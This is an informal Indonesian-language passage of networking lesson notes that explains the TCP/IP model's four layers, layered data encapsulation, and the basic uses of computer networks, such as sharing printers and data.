Lapisan ini berurusan langsung dengan media transmisi fisik, seperti kabel tembaga, serat optik, sinyal listrik, maupun gelombang radio.

Di sinilah data benar-benar dikirim dalam bentuk bit (0 dan 1).
Jadi, semua konektor, kabel, port, dan perangkat keras seperti switch, hub, serta repeater bekerja di lapisan ini.

Oke, setelah kita membahas OSI Layer kita lanjut ke pembahasan TCP/IP.


MODEL TCP/IP

TCP/IP ini bisa dibilang sebagai generasi penerus dari OSI Layer.
Model OSI lebih bersifat teoiritis digunakan untuk pembelajaran saja untuk menjelaskan konsep dan proses komunikasi data antar perangkat.

Sedangkan model TCP/IP (Transmission Control Protocol / Internet Protocol) adalah implementasi nyata yang benar-benar digunakan pada jaringan komputer dan internet saat ini.


Dengan kata lain, TCP/IP adalah versi praktis dari konsep OSI.
Karena sifatnya lebih sederhana dan efisien, semua komunikasi jaringan modern termasuk internet saat ini berdasarkan pada model TCP/IP, bukan OSI lagi.

Back to history Model TCP/IP ini dikembangkan oleh Departemen Pertahanan Amerika Serikat (DoD) pada tahun 1970-an sebagai dasar untuk jaringan ARPANET, yang kemudian menjadi cikal bakal internet.

Model ini memiliki 4 lapisan utama, yang masing-masing memiliki fungsi hampir mirip dengan OSI Layer, hanya saja beberapa lapisan digabung untuk memudahkan implementasi.

1. Application Layer

Lapisan ini menggabungkan tiga lapisan paling atas dari OSI (Application, Presentation, dan Session).
Application Layer bertugas untuk menyediakan layanan jaringan langsung kepada pengguna atau aplikasi seperti browser, email client, dan sebagainya.

Contohnya, ketika kita membuka sebuah situs web, browser menggunakan protokol HTTP atau HTTPS untuk mengakses data dari server.
Selain itu, terdapat juga protokol lain seperti FTP, SMTP, POP3, DNS, dan lain-lain yang bekerja di lapisan ini.


2. Transport Layer

Transport Layer berfungsi untuk mengatur komunikasi antara dua perangkat host.
Lapisan ini memastikan data dikirim dari aplikasi pengirim ke aplikasi penerima dengan benar dan sesuai urutan.

Dua protokol utama di lapisan ini adalah:

  • TCP (Transmission Control Protocol) → menjamin data dikirim dengan keandalan tinggi dan berurutan.

  • UDP (User Datagram Protocol) → lebih cepat, tetapi tidak menjamin keutuhan data.


3. Internet Layer

Internet Layer bertanggung jawab untuk pengalamatan dan pengiriman paket data antar jaringan.
Di sini digunakan IP (Internet Protocol) sebagai identitas logis setiap perangkat di jaringan.
Lapisan ini juga menentukan jalur yang akan ditempuh oleh paket agar sampai ke tujuan, mirip dengan fungsi Network Layer pada OSI.

Protokol yang digunakan di sini antara lain:
IP, ICMP, ARP, dan RARP.


4. Network Access Layer

Lapisan ini merupakan lapisan paling bawah dalam model TCP/IP, yang mengatur bagaimana data dikirim melalui media fisik seperti kabel, fiber, atau gelombang radio.
Lapisan ini juga menangani komunikasi antar perangkat dalam jaringan lokal (LAN) dan bertanggung jawab atas pengalamatan fisik menggunakan MAC Address.

Lapisan ini merupakan gabungan dari Data Link Layer dan Physical Layer pada model OSI.


Cara Kerja OSI Layer dan TCP/IP

Baik model OSI Layer maupun TCP/IP, keduanya menggambarkan bagaimana data dikirim dari satu perangkat ke perangkat lain melalui jaringan.
Walaupun jumlah lapisannya berbeda, prinsip kerjanya hampir sama, yaitu data akan melewati setiap lapisan dari atas ke bawah saat dikirim, dan dari bawah ke atas saat diterima.

Secara sederhana, proses kerjanya bisa dijelaskan seperti berikut:

  1. Dari sisi pengirim (sender), data berasal dari aplikasi — misalnya ketika kita mengirim pesan, membuka web, atau mengirim file.
    Data tersebut kemudian melewati setiap lapisan secara bertahap:

    • Di Application Layer, data dibuat oleh aplikasi (misalnya HTTP untuk web).

    • Di Transport Layer, data dipecah menjadi segmen dan diberi nomor urut agar bisa disusun kembali saat diterima.

    • Di Network Layer, setiap segmen diberi alamat IP tujuan agar tahu ke mana harus dikirim.

    • Di Data Link/Network Access Layer, data dibungkus menjadi frame dan diberi alamat MAC agar bisa dikirim ke perangkat berikutnya melalui media fisik.

    • Di Physical Layer, data dikirim dalam bentuk sinyal listrik, cahaya, atau gelombang radio.

  2. Di sisi penerima (receiver), prosesnya terjadi kebalikan dari pengirim.

    • Physical Layer menerima sinyal dari media fisik.

    • Data Link Layer memastikan frame diterima dengan benar dan mengekstrak datanya.

    • Network Layer memeriksa alamat IP untuk memastikan data sampai ke tujuan yang benar.

    • Transport Layer menyusun kembali segmen menjadi data utuh.

    • Dan terakhir, Application Layer menampilkan hasilnya ke aplikasi pengguna, seperti halaman web di browser atau pesan yang muncul di layar.

Dengan cara kerja berlapis seperti ini, setiap lapisan hanya fokus pada tugasnya masing-masing, namun tetap bekerja sama agar komunikasi antar perangkat bisa berjalan dengan lancar.
Inilah yang membuat konsep model berlapis (layered model) menjadi dasar dari semua sistem komunikasi jaringan modern.


 

  1. PENGENALAN JARINGAN KOMPUTER

Secara sederhana fungsi dari komputer network adalah mempermudah kita untuk sharing informasi, contohnya dalam gambar ini.



Nah disitu bisa di lihat ada beberapa perangkat seperti Laptop, komputer, Printer, dan HP itu sama sama terhubung ke Router.

Nah ketika semua device(perangkat) sudah terhubung ke Router maka semuanya sudah termasuk dalam jaringan komputer.

Nah kalo sudah membentuk Jaringan komputer, maka mereka semua sudah bisa saling bertukar informasi.

Fungsinya apa? kita back dulu ke histrory(sejarah),,, jadi dulu anggap saja ada sebuah ruangan dan dalam ruangan itu ada sebuah komputer, misal ada 6 komputer, dan juga misal ada orang yang ingin mengeprint dokument atau apa gitu,,,,

nah ngeprint itu harus membutuhkan printer, dan printer itu harus di hubungkan dengan komputernya, jadi satu komputer hanya bisa untuk satu printer,,,, berbeda lagi kalo sudah ada jaringan komputer,,,

jikalau printernya itu di hubungkan ke router, dan juga pcnya juga terhubung ke router maka nanti ngga perlu satu printer satu komputer,,,, mau puluhan komputer atau ratusan komputer pun bisa kalo semisal mau ngeprint ke printer, dikarenakan apa? karena semuanya sudah terhubung ke jaringan komputer. Nah itulah keuntungan dari jaringan komputer itu sendiri.

Fungsi lainnya apakah ada bang win? Ada… yaitu sharing data, contohnya dulu ataupun sampe sekarang kita kalau sharing data itu menggunakan flashdisk dari suatu komputer ke komputer lain.

misal contoh di wisma ini kalo pengen sharing data ke teman kita yang ada di bawah/ranjang, nah kalo pake flashdisk kan kita harus bawa dulu ke bawah flashdisknya kebawah baru bisa di dapatkan data yang di sharing.

dengan cara itu kurang efisien, dengan adanya jaringan komputer… ketika komputer yang di kelas ini dan komputer yang di bawah/ranjang itu sama sama terhubung ke jaringan(router) yang sama, maka nanti akan bisa saling sharing data langsung tanpa perlu kita cabut colok flashdisk dan turun kebawah.

Dan juga sharing datanya itu bisa langsung ke beberapa orang dalam jaringan, ngga hanya bisa sharing data ke satu orang doang…

Dan selain itu, semua orang termasuk temen temen yang ada disini itu sudah pasti menggunakan jaringan komputer, contohnya dari handphone temen temen itu sedang membuka instagram, atau facebook. Nah ketika temen2 itu membuka fb/ig itu sebenernya sudah memanfaatkan jaringan komputer.

Lah kenapa kok bisa gitu bang win?

Nah kenapa bisa demikian, Karena handphone temen2 itu connect ke router menggunakan wifi ataupun kartu sim, kemudian router itu terhubung ke ISP(Internet Service Provider) (penyedia jasa internet) nah dari ISP itulah terhubung ke internet yang sangat luas sekali, nah di suatu internet tersebut terdapat Servernya facebook yang juga terhubung ke internet.

Jadi flownya dari hendphone temen2 —> router —> ISP —> internet —> akan sampai ke server facebook

Nah situlah kita bisa lihat, dan mungkin yang baru ngerti tidak sadar kalau sehari hari kita sudah memanfaatkan yang namanya jaringan komputer.